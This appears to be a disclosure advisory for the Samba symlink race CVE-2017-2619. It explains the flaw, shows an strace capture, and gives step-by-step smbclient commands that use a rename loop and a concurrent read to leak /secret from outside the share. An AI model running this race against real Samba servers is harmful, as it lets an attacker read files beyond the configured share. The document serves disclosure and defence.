Samba: symlink race permits opening files outside share directory (CVE-2017-2619)

The Samba server is supposed to only grant access to the configured share directories unless the “wide links” are enabled, in which case the server is allowed to follow symlinks. The default (since CVE-2010-0926) is that wide links are disabled.

smbd ensures that it isn’t following symlinks by calling lstat() on every path component, as can be seen in strace (in reaction to the request “get a/b/c/d/e/f/g/h/i/j”, where /public is the root directory of the share):

root@debian:/home/user# strace-e trace=file-p18954 Process 18954 attached lstat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0 getcwd("/public", 4096) = 8 lstat("/public/a", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/public/a/b", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c/d", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c/d/e", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c/d/e/f", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c/d/e/f/g", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c/d/e/f/g/h", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c/d/e/f/g/h/i", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0 stat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0 getxattr("a/b/c/d/e/f/g/h/i/j", "system. posix_acl_access", 0x7ffc8d870c30, 132) = -1 ENODATA (No data available) stat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0 open("a/b/c/d/e/f/g/h/i/j", O_RDONLY) = 35

This is racy: Any of the path components - either one of the directories or the file at the end - could be replaced with a symlink by an attacker over a second connection to the same share. For example, replacing a/b/c/d/e/f/g/h/i with a symlink to / immediately before the open() call would cause smbd to open /j.

To reproduce:

• Set up a server with Samba 4.5.2. (I’m using Samba 4.5.2 from Debian unstable. I’m running the attacks on a native machine while the server is running in a VM on the same machine.)

• On the server, create a world-readable file “/secret” that contains some text. The goal of the attacker is to leak the contents of that file.

• On the server, create a directory “/public”, mode 0777.

• Create a share named “public”, accessible for guests, writable, with the path “/public”.

• As the attacker, patch a copy of the samba-4.5.2 sourcecode with the patch in attack_commands. patch.

• Build the patched copy of the samba-4.5.2. The built-in smbclient will be used in the following steps.

• Prepare the server’s directory layout remotely and start the rename side of the race: `` $ ./ bin/default/source3/client/smbclient-N-U guest //192.168.56.101/public ./ bin/default/source3/client/smbclient: Can’t load /usr/local/samba/etc/smb. conf - run testparm to debug it Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.2-Debian] smb: > posix Server supports CIFS extensions 1.0 Server supports CIFS capabilities locks acls pathnames posix_path_operations large_read posix_encrypt the smb: /> ls . D 0 Wed Dec 14 23:54:30 2016 … D 0 Wed Dec 14 13:02:50 2016

  98853468 blocks of size 1024. 66181136 blocks available
  

the smb: /> symlink / link the smb: /> mkdir normal the smb: /> put /tmp/empty normal/secret # empty file putting file /tmp/empty as /normal/secret (0.0 kb/s) (average 0.0 kb/s) the smb: /> rename_loop use normal foobar ``

• Over a second connection, launch the read side of the race: $ ./ bin/default/source3/client/smbclient-N-U guest //192.168.56.101/public ./ bin/default/source3/client/smbclient: Can't load /usr/local/samba/etc/smb. conf - run testparm to debug it Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.2-Debian] smb: \> posix Server supports CIFS extensions 1.0 Server supports CIFS capabilities locks acls pathnames posix_path_operations large_read posix_encrypt the smb: /> dump foobar/secret

• At this point, the race can theoretically be hit. However, because the renaming client performs operations synchronously, the network latency makes it hard to win the race. (It shouldn’t be too hard to adapt the SMB client to be asynchronous, which would make the attack much more practical.) To make it easier to hit the race, log in to the server as root and run “strace” against the process that is trying to access foobar/secret all the time without any filtering (“strace-p19624”). On my machine, this causes the race to be hit every few seconds, and the smbclient that is running the “dump” command prints the contents of the file each time the race is won.

Attachment: attack_commands. patch